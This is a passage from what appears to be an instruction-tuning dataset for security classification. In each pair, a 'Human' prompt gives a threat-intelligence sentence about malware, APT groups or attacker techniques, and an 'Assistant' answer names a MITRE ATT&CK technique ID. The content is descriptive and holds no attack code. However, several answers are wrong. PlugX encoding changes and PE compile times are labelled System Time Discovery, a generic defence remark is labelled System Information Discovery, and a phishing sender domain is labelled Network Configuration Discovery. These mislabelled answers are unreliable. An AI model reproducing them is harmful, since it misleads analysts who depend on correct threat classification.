Phishing" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Octopus has been delivered via spearsphishing emails.### Assistant: T1566: Phishing" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Astaroth can check for Windows product ID's used by sandboxes and usernames and disk serial numbers associated with analyst environments.### Assistant: T1497: Virtualization/Sandbox Evasion" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may modify file time attributes to hide new or changes to existing files.### Assistant: T1070: Indicator Removal on Host" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,njRAT can access the victim's webcam.### Assistant: T1125: Video Capture" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Sandworm Team has disabled event logging on compromised systems.### Assistant: T1562: Impair Defenses" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,DarkHydrus used an open-source tool, Phishery, to inject malicious remote template URLs into Microsoft Word documents and then sent them to victims to enable Forced Authentication.### Assistant: T1221: Template Injection" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Magic Hound has obtained and used open-source penetration testing tools like Havij, sqlmap, Metasploit, and Mimikatz.### Assistant: T1588: Obtain Capabilities" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,W32Time time providers are responsible for retrieving time stamps from hardware/network resources and outputting these values to other network clients.### Assistant: T1547: Boot or Logon Autostart Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,There are several examples of different types of threats leveraging mshta.exe during initial compromise and for execution of code Mshta.exe is a utility that executes Microsoft HTML Applications files.### Assistant: T1218: Signed Binary Proxy Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Extensible Stylesheet Language files are commonly used to describe the processing and rendering of data within XML files.### Assistant: T1220: XSL Script Processing" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,TrickBot has used printf and file I/O loops to delay process execution as part of API hammering.### Assistant: T1497: Virtualization/Sandbox Evasion" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT28 has used IMAP, POP3, and SMTP for a communication channel in various implants, including using self-registered Google Mail accounts and later compromised email servers of its victims.### Assistant: T1071: Application Layer Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Ursnif has used tmp files to stage gathered information.### Assistant: T1074: Data Staged" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,For example, an adversary may be able to identify a sandbox accelerating time by sampling and calculating the expected value for an environment's timestamp before and after execution of a sleep function.### Assistant: T1497: Virtualization/Sandbox Evasion" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Twitoor uses Twitter for command and control.### Assistant: T1102: Web Service" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may abuse systemd timers to perform task scheduling for initial or recurring execution of malicious code.### Assistant: T1053: Scheduled Task/Job" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Inception used a browser plugin to steal passwords and sessions from Internet Explorer, Chrome, Opera, Firefox, Torch, and Yandex.### Assistant: T1555: Credentials from Password Stores" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Cobalt Group has used HTTPS for C2.### Assistant: T1071: Application Layer Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,OopsIE also encodes collected data in hexadecimal format before writing to files on disk and obfuscates strings.### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Grandoreiro can identify installed security tools based on window names.### Assistant: T1010: Application Window Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Several of the tools mentioned in associated sub-techniques may be used by both adversaries and professional security testers.### Assistant: T1003: OS Credential Dumping" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,TrickBot can gather information about domain trusts by utilizing Nltest.### Assistant: T1482: Domain Trust Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries can use LKMs and kexts to covertly persist on a system and elevate privileges.### Assistant: T1547: Boot or Logon Autostart Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Cobalt Group used the Ammyy Admin tool as well as TeamViewer for remote access, including to preserve remote access if a Cobalt Strike module was lost.### Assistant: T1219: Remote Access Software" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may acquire user credentials from password managers by extracting the master password and/or plain-text credentials from memory.### Assistant: T1555: Credentials from Password Stores" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Mivast creates the following Registry entry: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Micromedia.### Assistant: T1547: Boot or Logon Autostart Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,An older variant of PLAINTEE performs UAC bypass.### Assistant: T1548: Abuse Elevation Control Mechanism" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may abuse netbooting to load an unauthorized network device operating system from a Trivial File Transfer Protocol server.### Assistant: T1542: Pre-OS Boot" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,LightNeuron gathers information about network adapters using the Win32 API call GetAdaptersInfo.### Assistant: T1016: System Network Configuration Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The Performance key contains the name of a driver service's performance DLL and the names of several exported functions in the DLL.### Assistant: T1574: Hijack Execution Flow" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Emotet has been seen exfiltrating system information stored within cookies sent within an HTTP GET request back to its C2 servers.### Assistant: T1041: Exfiltration Over C2 Channel" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Patchwork bypassed User Access Control .### Assistant: T1548: Abuse Elevation Control Mechanism" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Egregor has used multiple anti-analysis and anti-sandbox techniques to prevent automated analysis by sandboxes.### Assistant: T1497: Virtualization/Sandbox Evasion" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The email may also contain instructions on how to decrypt an attachment, such as a zip file password, in order to evade email boundary defenses.### Assistant: T1566: Phishing" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Encryption consists of XOR with a hardcoded key for its configuration and RC4 with a predefined password for encrypting the victim’s data### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The device typically stores an in-memory copy of the configuration while operating, and a separate configuration on non-volatile storage to load after device reset.### Assistant: T1602: Data from Configuration Repository" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,A module in Prikormka collects information from the victim about the current user name.### Assistant: T1033: System Owner/User Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Lucifer can collect the IP address of a compromised host.### Assistant: T1016: System Network Configuration Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Depending on the systems within the network, initializing one of these scripts could apply to more than one or potentially all systems.### Assistant: T1037: Boot or Logon Initialization Scripts" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Once malicious rules have been added to the user’s mailbox, they will be loaded when Outlook is started.### Assistant: T1137: Office Application Startup" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,AutoIt backdoor downloads a PowerShell script that decodes to a typical shellcode loader.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,DropBook can execute arbitrary shell commands on the victims' machines.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Winnti for Linux has used ICMP, custom TCP, and UDP in outbound communications.### Assistant: T1095: Non-Application Layer Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,WINERACK can gather information on the victim username.### Assistant: T1033: System Owner/User Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Agent Tesla has the ability to steal credentials from FTP clients and wireless profiles.### Assistant: T1555: Credentials from Password Stores" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may make modifications to client software binaries to carry out malicious tasks when those applications are in use.### Assistant: T1554: Compromise Client Software Binary" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,httpclient uses HTTP for command and control.### Assistant: T1071: Application Layer Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks.### Assistant: T1219: Remote Access Software" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Kwampirs collects a list of available servers with the command net view.### Assistant: T1018: Remote System Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The technique of having a signed, legitimate, executable load a malicious library is commonly referred to as side-loading, and has been witnessed in a number of campaigns and malware families in the past### Assistant: T1574: Hijack Execution Flow" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,FIN7 malware has created Registry Run and RunOnce keys to establish persistence, and has also added items to the Startup folder.### Assistant: T1547: Boot or Logon Autostart Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Create Service### Assistant: T1543: Create or Modify System Process" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,TYPEFRAME can execute commands using a shell.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,NETWIRE can use XDG Autostart Entries to establish persistence.### Assistant: T1547: Boot or Logon Autostart Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Ixeshe can collect data from a local system.### Assistant: T1005: Data from Local System" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,ROKRAT can request to upload collected host data and additional files.### Assistant: T1005: Data from Local System" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Within cloud environments, adversaries may attempt to discover services running on other cloud hosts.### Assistant: T1046: Network Service Scanning" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Bandook has modules that are capable of capturing audio.### Assistant: T1123: Audio Capture" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,and then deletes the original launcher### Assistant: T1070: Indicator Removal on Host" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,ComRAT has used cmd.exe to execute commands.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Fox Kitten has used PowerShell scripts to access credential data.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Using rundll32.exe, vice executing directly Shared Modules, may avoid triggering security tools that may not monitor execution of the rundll32.exe process because of allowlists or false positives from normal operations.### Assistant: T1218: Signed Binary Proxy Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may attempt to get a listing of domain accounts.### Assistant: T1087: Account Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT3 has a tool that can enumerate current network connections.### Assistant: T1049: System Network Connections Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Revenge RAT uses Base64 to encode information sent to the C2 server.### Assistant: T1132: Data Encoding" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Its encoding method has been modified from time to time, aligned with major upgrade of PlugX itself### Assistant: T1124: System Time Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,SYSCON has the ability to use Tasklist to list running processes.### Assistant: T1057: Process Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Bundlore can execute JavaScript by injecting it into the victim's browser.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The email contained an attachment named Seminar-Invitation.doc, which is a malicious Microsoft Word document we track as ThreeDollars### Assistant: T1566: Phishing" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,It will also gather the username of running processes to determine if it is running as SYSTEM.### Assistant: T1033: System Owner/User Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,ZLib communicates over HTTP for C2.### Assistant: T1071: Application Layer Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,StrongPity has used encrypted strings in its dropper component.### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,GrimAgent can delete old binaries on a compromised host.### Assistant: T1070: Indicator Removal on Host" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Machete is written in Python and is used in conjunction with additional Python scripts.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,In containerized environments, this may also be done by creating a resource in a namespace that matches the naming convention of a container pod or cluster.### Assistant: T1036: Masquerading" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may install a new Launch Agent that executes at login by placing a .plist file into the appropriate folders with the RunAtLoad or KeepAlive keys set to true.### Assistant: T1543: Create or Modify System Process" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,FIN8 aggregates staged data from a network into a single location.### Assistant: T1074: Data Staged" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Fysbis has the ability to create and execute commands in a remote shell for CLI.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may also try brute forcing via Password Guessing to obtain the master password of a password manager.### Assistant: T1555: Credentials from Password Stores" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT39 has sent spearphishing emails in an attempt to lure users to click on a malicious link.### Assistant: T1204: User Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Unique SIPs exist for most file formats and are identified by globally unique identifiers .### Assistant: T1553: Subvert Trust Controls" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Some systems may automatically restart critical applications and services when crashes occur, but they can likely be re-exploited to cause a persistent DoS condition.### Assistant: T1499: Endpoint Denial of Service" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Crutch can monitor removable drives and exfiltrate files matching a given extension list.### Assistant: T1025: Data from Removable Media" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,AppleSeed can zip and encrypt data collected on a target system.### Assistant: T1560: Archive Collected Data" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,EnvyScout can determine whether the ISO payload was received by a Windows or iOS device.### Assistant: T1082: System Information Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Multiple ways of delivering exploit code to a browser exist, including: * A legitimate website is compromised where adversaries have injected some form of malicious code such as JavaScript, iFrames, and cross-site scripting.### Assistant: T1189: Drive-by Compromise" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Msxsl.exe takes two main arguments, an XML source file and an XSL stylesheet.### Assistant: T1220: XSL Script Processing" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,A multilayered approach is a must to securing the organization’s perimeter, especially for information security professionals and system/IT administrators### Assistant: T1082: System Information Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,yty gets an output of running processes using the tasklist command.### Assistant: T1057: Process Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Machete has the capability to exfiltrate stolen data to a hidden folder on a removable drive.### Assistant: T1564: Hide Artifacts" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Aria-body has the ability to identify the titles of running windows on a compromised host.### Assistant: T1010: Application Window Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,ZeroT has retrieved stage 2 payloads as Bitmap images that use Least Significant Bit steganography.### Assistant: T1001: Data Obfuscation" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Decrypted backdoor configuration Reverse analysis of TClient allowed us to determine how to decrypt the C&C information### Assistant: T1140: Deobfuscate/Decode Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,FakeM contains a keylogger module.### Assistant: T1056: Input Capture" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The PE compile time of loaders and the create time of droppers (Word documents) are plotted in the graph### Assistant: T1124: System Time Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,PolyglotDuke has has used HTTP GET requests in C2 communications.### Assistant: T1071: Application Layer Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Destructive dstr command in BE2 config file Also, on some machines, documents were encrypted, but no related plugin could be found### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Anchor has come with a packed payload.### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,MacSpy persists via a Launch Agent.### Assistant: T1543: Create or Modify System Process" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,However, the campaign that the PDC has recently observed has been delivering this keylogger exclusively### Assistant: T1056: Input Capture" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Usually this series of packets consists of attempted connections to a predefined sequence of closed ports Port Knocking, but can involve unusual flags, specific strings, or other unique characteristics.### Assistant: T1205: Traffic Signaling" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,FIN8 has distributed targeted emails containing Word documents with embedded malicious macros.### Assistant: T1566: Phishing" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Taidoor has been delivered through spearphishing emails.### Assistant: T1566: Phishing" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Later implants used by APT28, such as CHOPSTICK, use a blend of HTTP, HTTPS, and other legitimate channels for C2, depending on module configuration.### Assistant: T1071: Application Layer Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may use these login hooks to maintain persistence on a single system.### Assistant: T1037: Boot or Logon Initialization Scripts" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,MURKYTOP: a command-line reconnaissance tool### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,TAINTEDSCRIBE can change the timestamp of specified filenames.### Assistant: T1070: Indicator Removal on Host" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,A number of PowerShell-based offensive testing tools are available, including Empire, PowerSploit, PoshC2, and PSAttack.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,MESSAGETAP stored targeted SMS messages that matched its target list in CSV files on the compromised system.### Assistant: T1074: Data Staged" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Sandworm Team has used Dropbear SSH with a hardcoded backdoor password to maintain persistence within the target network.### Assistant: T1133: External Remote Services" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The emails had a malicious Excel macro document attached, which when executed led to a new Microsoft Visual Basic (VB) script-based malware family which we are dubbing “BabyShark”### Assistant: T1566: Phishing" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may accomplish this by disabling individual services of high importance to an organization, such as MSExchangeIS, which will make Exchange content inaccessible .### Assistant: T1489: Service Stop" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may corrupt or wipe the disk data structures on a hard drive necessary to boot a system; targeting specific critical systems or in large numbers in a network to interrupt availability to system and network resources.### Assistant: T1561: Disk Wipe" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may target the Management Information Base to collect and/or mine valuable information in a network managed using Simple Network Management Protocol .### Assistant: T1602: Data from Configuration Repository" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.### Assistant: T1083: File and Directory Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Additionally, it searches for the "".vnc.lnk"" affix to steal VNC credentials.### Assistant: T1552: Unsecured Credentials" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,At installation, the MSI file drops three files and creates one hidden directory (UFile) into C:\ProgramData\Apple\Update\, likely as a ruse### Assistant: T1564: Hide Artifacts" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,RedLeaves is capable of downloading a file from a specified URL.### Assistant: T1105: Ingress Tool Transfer" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Lucifer can execute TCP, UDP, and HTTP denial of service attacks.### Assistant: T1498: Network Denial of Service" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Figure 6 shows the Glimpse server responding to an inbound beacon from the Glimpse agent and sending a command whoami### Assistant: T1033: System Owner/User Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Cobian RAT creates an autostart Registry key to ensure persistence.### Assistant: T1547: Boot or Logon Autostart Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The mericcs.org domain was used as the sender address, as well as the hosting location of the malicious RTF document### Assistant: T1016: System Network Configuration Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,rundll32.exe### Assistant: T1218: Signed Binary Proxy Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Azorult can dump credentials from victim browsers.### Assistant: T1003: OS Credential Dumping" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,In some cases, the passing of files embedded using steganography, such as image or document files, can be used for command and control.### Assistant: T1001: Data Obfuscation" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The sethc.exe program is often referred to as ""sticky keys"", and has been used by adversaries for unauthenticated access through a remote desktop login screen.### Assistant: T1546: Event Triggered Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Elise communicates over HTTP or HTTPS for C2.### Assistant: T1071: Application Layer Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,RogueRobin establishes persistence by creating a shortcut in the Windows startup folder to run a script each time the user logs in.### Assistant: T1547: Boot or Logon Autostart Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may leverage the AiTM position to attempt to modify traffic, such as in Transmitted Data Manipulation.### Assistant: T1557: Adversary-in-the-Middle" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,FinFisher obtains the hardware device list and checks if the MD5 of the vendor ID is equal to a predefined list in order to check for sandbox/virtualized environments.### Assistant: T1497: Virtualization/Sandbox Evasion" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,SMOKEDHAM has relied upon users clicking on a malicious link delivered through phishing.### Assistant: T1204: User Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Penquin can execute remote commands using bash scripts.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Backdoored images may be uploaded to a public repository via Upload Malware, and users may then download and deploy an instance or container from the image without realizing the image is malicious, thus bypassing techniques that specifically achieve Initial Access.### Assistant: T1204: User Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Credentialing and authentication mechanisms may be targeted for exploitation by adversaries as a means to gain access to useful credentials or circumvent the process to gain access to systems.### Assistant: T1212: Exploitation for Credential Access" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,WastedLocker has performed DLL hijacking before execution.### Assistant: T1574: Hijack Execution Flow" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,AppleJeus has been distributed via spearphishing link.### Assistant: T1566: Phishing" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT32 has set up and operated websites to gather information and deliver malware.### Assistant: T1583: Acquire Infrastructure" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may abuse Visual Basic for execution.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,HotCroissant has the ability to list the names of all open windows on the infected host.### Assistant: T1010: Application Window Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,SUNBURST collected the username from a compromised host.### Assistant: T1033: System Owner/User Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Cobalt Strike's Beacon payload can collect information on process details.### Assistant: T1057: Process Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,However, certain shims can be used to Bypass User Account Control , inject DLLs into processes , disable Data Execution Prevention and Structure Exception Handling , and intercept memory addresses .### Assistant: T1546: Event Triggered Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may use network logon scripts automatically executed at logon initialization to establish persistence.### Assistant: T1037: Boot or Logon Initialization Scripts" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may chain together multiple proxies to further disguise the source of malicious traffic.### Assistant: T1090: Proxy" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Shamoon obtains the system time and will only activate if it is greater than a preset date.### Assistant: T1124: System Time Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Gold Dragon enumerates registry keys with the command regkeyenum and obtains information for the Registry key HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run.### Assistant: T1012: Query Registry" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Tropic Trooper has attempted to transfer USBferry from an infected USB device by copying an Autorun function to the target machine.### Assistant: T1091: Replication Through Removable Media" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Assuming the lists of credentials are valid, the mass collection confirms our hypothesis that the OilRig group maintains a heavy emphasis on credential based attacks along with the other types of attacks they deploy### Assistant: T1003: OS Credential Dumping" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,ZxShell has a feature to capture a remote computer's keystrokes using a keylogger.### Assistant: T1056: Input Capture" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Prikormka uses rundll32.exe to load its DLL.### Assistant: T1218: Signed Binary Proxy Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Lsadump also includes NetSync, which performs DCSync over a legacy replication protocol.### Assistant: T1003: OS Credential Dumping" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,P8RAT can check the compromised host for processes associated with VMware or VirtualBox environments.### Assistant: T1497: Virtualization/Sandbox Evasion" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Bazar can use Winlogon Helper DLL to establish persistence.### Assistant: T1547: Boot or Logon Autostart Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,macOS and Linux both keep track of system or user-initiated actions via system logs.### Assistant: T1070: Indicator Removal on Host" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,By applying two specific obfuscation techniques within Invoke-Obfuscation, we were able to create an obfuscated PowerShell script that was very similar to the QUADAGENT payloads delivered in the attacks discussed in this blog### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,build_downer has the ability to send system volume information to C2.### Assistant: T1082: System Information Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT32's backdoor has modified the Windows Registry to store the backdoor's configuration.### Assistant: T1112: Modify Registry" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Figure 9: Example Network Communication In the example, the POWRUNER client sends a random GET request to the C2 server and the C2 server sends the random number (99999999990) as a response### Assistant: T1573: Encrypted Channel" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Dylibs are loaded into an application's address space allowing the malicious dylib to inherit the application's privilege level and resources.### Assistant: T1574: Hijack Execution Flow" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Helminth encrypts data sent to its C2 server over HTTP with RC4.### Assistant: T1573: Encrypted Channel" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,NOKKI has used FTP for C2 communications.### Assistant: T1071: Application Layer Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may abuse this technology to initially conceal malicious code to be executed via documents.### Assistant: T1221: Template Injection" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Mofang's malicious spearphishing attachments required a user to open the file after receiving.### Assistant: T1204: User Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,AtomBombing is another variation that utilizes APCs to invoke malicious code previously written to the global atom table.### Assistant: T1055: Process Injection" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Network sniffing may also reveal configuration details, such as running services, version numbers, and other network characteristics necessary for subsequent Lateral Movement and/or Defense Evasion activities.### Assistant: T1040: Network Sniffing" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may also use Masquerading to make the Registry entries look as if they are associated with legitimate programs.### Assistant: T1547: Boot or Logon Autostart Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Pony attachments have been delivered via compressed archive files.### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,PowerShower has used 7Zip to compress .txt, .pdf, .xls or .doc files prior to exfiltration.### Assistant: T1560: Archive Collected Data" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Technique Description Fan Check The Trojan will perform the following WMI query:   Select * from Win32_Fan   According to MSDN, this query should return a class that provides statistics on the CPU fan### Assistant: T1047: Windows Management Instrumentation" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Gamaredon Group has delivered macros which can tamper with Microsoft Office security settings.### Assistant: T1562: Impair Defenses" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The ""Blackwater.bas"" macro was obfuscated using a substitution cipher whereby the characters are replaced with their corresponding integer.### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,NetPass is a free network password recovery tool that, according to its developer Nirsoft, can recover passwords including: Login passwords of remote computers on LAN### Assistant: T1003: OS Credential Dumping" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The loader will then inject a DLL backdoor into dllhost.exe### Assistant: T1055: Process Injection" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Fox Kitten has base64 encoded scripts and payloads to avoid detection.### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Stuxnet enumerates the directories of a network resource.### Assistant: T1135: Network Share Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,UNC2452 configured at least one instance of Cobalt Strike to use a network pipe over SMB during the 2020 SolarWinds intrusion.### Assistant: T1090: Proxy" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The most interesting part is the decrypted C&C configuration, as can be seen in the image below### Assistant: T1140: Deobfuscate/Decode Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,BRONZE BUTLER has used at to register a scheduled task to execute malware during lateral movement.### Assistant: T1053: Scheduled Task/Job" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,menuPass has used RDP connections to move across the victim network.### Assistant: T1021: Remote Services" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,However, the sudoers file can also specify when to not prompt users for passwords with a line like user1 ALL= NOPASSWD: ALL .### Assistant: T1548: Abuse Elevation Control 